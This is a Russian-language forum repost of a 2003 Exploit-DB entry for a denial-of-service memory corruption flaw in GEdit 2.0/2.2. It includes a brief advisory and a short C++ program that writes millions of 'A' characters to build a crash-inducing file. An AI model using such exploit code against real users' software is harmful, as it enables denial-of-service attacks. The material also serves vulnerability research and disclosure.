Exploit GEdit 2.0/2.2 - Large IOStream File Memory Corruption

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
23393
Проверка EDB
  1. Пройдено
Автор
MEGAHZ
Тип уязвимости
DOS
Платформа
LINUX
CVE
N/A
Дата публикации
2003-11-23
C:
// source: https://www.securityfocus.com/bid/9090/info

A problem has been reported in the handling of certain file types by gEdit. Memory corruption may occur when handling files containing long strings. Because of this, it may be possible to cause memory corruption. 

/*
        simple buffer overflow generator by MegaHz [email protected]
*/
#include <iostream>
using namespace std;

int main()
{
int i;
for (i=0;i<=9999999;i++)
        {
        cout << "A";
        }
        return 0;
}
 
Источник
www.exploit-db.com

Похожие темы